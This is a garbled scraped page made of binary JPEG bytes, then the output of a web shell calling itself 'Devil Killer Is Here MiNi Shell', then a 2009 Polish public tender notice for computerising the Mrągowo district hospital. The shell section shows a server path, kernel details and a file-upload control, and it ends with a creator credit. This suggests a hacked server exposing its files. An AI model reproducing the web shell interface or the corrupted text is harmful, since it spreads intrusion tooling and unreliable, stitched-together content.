JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/67796-N-2009.html

<p class="kh_header"><b>Mrągowo: Komputeryzacja Szpitala</b><br>
<b>Numer ogłoszenia: 67796 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy im. M. Kajki , ul. Wolności 12, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 089 7412127, faks 089 7412127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Komputeryzacja Szpitala.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pod nazwą: ZAKUP OPROGRAMOWANIA SZPITALNEGO SYSTEMU INFORMATYCZNEGO, FINANSOWO - KSIĘGOWEGO, KADROWO PŁACOWEGO ORAZ SPRZĘTU KOMPUTEROWEGO I WYKONANIA SIECI KOMPUTEROWEJ dla Szpitala Powiatowego w Mrągowie, realizowanego w roku 2009, obejmującego następujące obszary:
1.1 Część SZPITALNEGO SYSTEMU INFORMATYCZNEGO (HIS)
1.2 Część finansowo-księgowa następujące moduły:
a) Księgowość, sprawozdawczość i analizy finansowe,
b) Majątek trwały i wyposażenie
c) Kasa,
d) Ewidencja czasu pracy
e) Rachunek kosztów
f) Kadry i płace
g) Gospodarka materiałowa
zwanego dalej oprogramowaniem aplikacyjnym.
1.3  Zakup SPRZĘTU KOMPUTEROWEGO
1.4 WYKONANIA SIECI KOMPUTEROWEJ
Przedmiotem zamówienia w szczególności jest:
- Dostawa bezterminowych licencji oprogramowania aplikacyjnego spełniającego warunki określone w Załączniku nr 1 do SIWZ oraz w umowie stanowiącej załącznik nr 6 do SIWZ
Zamawiający wymaga od Wykonawcy załączenia do oferty propozycji dokumentów licencyjnych dla oferowanego oprogramowania aplikacyjnego. 
- Wdrożenie oprogramowania aplikacyjnego obejmujące: instalacje oprogramowania aplikacyjnego, konfiguracja, przeniesienie danych oraz szkolenie użytkowników i szkolenie administratorów systemu w zakresie użytkowania oprogramowania aplikacyjnego - szczegółowy zakres usług zawiera Załącznik nr 2 do SIWZ.
- Świadczenie usług gwarancyjnych i serwisowych wobec dostarczonego i zrealizowanego przedmiotu zamówienia w okresie 24 miesięcy od daty podpisania protokołu odbioru końcowego.

Wymagania obligatoryjne:
1. Wymagania obligatoryjne zostały określone w Załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.
Jeżeli nie zostaną spełnione wszystkie wymagania obligatoryjne, określone w Załączniku nr 1 do SIWZ, oferta jest odrzucona bez dalszej oceny.

2. Wymagania dotyczące dostawy i wdrożenia oprogramowania Szpitalnego systemu informatycznego, finansowo - księgowego, kadrowo płacowego oraz przeprowadzenia szkoleń administratorów systemu i szkolenia personelu Zamawiającego:

3.1 Wykonawca w ramach dostawy dostarczy, zainstaluje i wykona Analizę przedwdrożeniową oraz prace wdrożeniowe jak również przeszkoli w zakresie obsługi użytkowników (min. 150 osób) oraz administratorów. 
Podczas szkolenia użytkowników musi zostać przekazana niezbędna wiedza do poprawnego użytkowania systemu, w obrębie przedmiotu zamówienia w zakresie wprowadzania danych, użytkowania raportów, wykonywania analiz i sprawozdań.
Zamawiający nie dopuszcza zakupu systemu, który nie posiada PEŁNEJ wymaganej funkcjonalności w chwili składania oferty.
3.2 Wykonawca zobowiązany jest do przeniesienia danych z obecnie funkcjonującego w Szpitalu oprogramowania w zakresie zamawianego oprogramowania aplikacyjnego. W ramach powyższej usługi Wykonawca jest zobowiązany do zasilenia bazy danymi będącymi w posiadaniu Zamawiającego. 
3.3 Wykonawca w ramach dostawy dostarczy, zainstaluje i uruchomi sprzęt komputerowy w ilości i o parametrach nie gorszych jak podanych w załączniku nr 1
3.4 Wykonawca w ramach usługi wykona sieć komputerową w oparciu o dostarczone przez siebie materiały zgodnie z załączonym w załączniku nr 7 planem sieci komputerowej oraz ślepym kosztorysem.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.44.00.00-4, 48.44.30.00-5, 48.00.00.00-8, 72.26.00.00-5, 72.26.30.00-6, 72.26.80.00-1, 72.70.00.00-7, 30.20.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca jest zobowiązany  wnieść  wadium  w  wysokości:  20 000,00 zł. (słownie: dwadzieścia tysięcy złotych 00/100). Szczegółowe wymagania określono w SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz spełniają warunki określone w art. 22 ust. 1 tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w trybie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
W szczególności Wykonawcy ubiegający się o udzielenie zamówienia powinni spełniać następujące merytoryczne warunki udziału w postępowaniu:
1. posiadają doświadczenie przy wykonywaniu zamówień o charakterze odpowiadającym przedmiotowi zamawianego zamówienia, polegające na tym, że w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonali co najmniej 3 dostawy oprogramowania w obszarze działania finansowo-księgowym oraz kadrowo płacowym wraz z wdrożeniem, jak również oprogramowania do obsługi części szpitalnej z modułami obejmującymi funkcje właściwe dla zadań szpitalnych jednostek organizacyjnych, takich jak: Izba Przyjęć, Apteka, Apteczki Oddziałowe, Zlecenia, Poradnie, Sala Operacyjna, zrealizowane na rzecz placówek służby zdrowia, o wartości nie mniejszej niż 500.000,00 zł brutto każda dostawa,
2. posiadają aktualne ubezpieczenie od odpowiedzialności cywilnej na wykonywane usługi na kwotę nie mniejszą niż 700 tyś zł.
Wykonawcy ubiegający się o udzielenie zamówienia powinni spełniać standardy jakościowe w zakresie świadczenia usług będących przedmiotem zamówienia w oparciu o system normatywny ISO 9001:2000 lub równoważny system potwierdzający spełnianie standardów jakościowych stawianych producentom oprogramowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Celem potwierdzenia spełnienia warunków, stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty:
1.Oferta - oferta cenowa (wzór stanowi Załącznik nr 3 do SIWZ).
2.Wypełniony załącznik nr 1 - Zestawienie parametrów obligatoryjnych dla całego zamówienia.
3. Oświadczenie zgodnie z art. 22  ust. 1 ustawy Prawo Zamówień Publicznych (wzór stanowi Załącznik nr 4 do SIWZ). 
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
8. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców co najmniej 3 dostaw oprogramowania w obszarze działania finansowo-księgowym oraz kadrowo płacowym wraz z wdrożeniem, jak również oprogramowania do obsługi części szpitalnej z modułami obejmującymi funkcje właściwe dla zadań szpitalnych jednostkek organizacyjnych, takich jak: Izba Przyjęć, Apteka, Apteczki Oddziałowe, Zlecenia, Poradnie, Sala Operacyjna, realizowanych na rzecz placówek służby zdrowia, o wartości nie mniejszej niż 500.000,00 zł brutto każda dostawa, oraz załączenia do oferty dokumentów potwierdzających, że dostawy te zostały wykonane należycie (wzór stanowi Załącznik nr 5 do SIWZ).
9. Zaświadczenia podmiotu uprawnionego do kontroli jakości, potwierdzające, iż Wykonawca spełnia wymogi jakościowe w zakresie świadczenia usług będących przedmiotem zamówienia: np. certyfikat ISO 9001:2000 producenta oprogramowania lub równoważnych dokumentów potwierdzających jakość świadczonych usług.
10. Aktualna polisa ubezpieczeniowa poświadczająca ubezpieczenie Oferenta od odpowiedzialności cywilnej na wykonywane usługi na kwotę 700 tyś zł.
11. Ponadto oferta musi posiadać inne dokumenty wyszczególnione w Załączniku nr 1

Inne wymagane oświadczenia i dokumenty:
12. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy.
13. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu stosownie do art. 23 ust. 2 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-mragowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Powiatowy im. Michała Kajki w Mrągowie
ul. Wolności 12
11-700 Mrągowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 09:00, miejsce: Szpital Powiatowy im. Michała Kajki w Mrągowie
ul. Wolności 12
11-700 Mrągowo
sekretariat (pokój nr 212).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com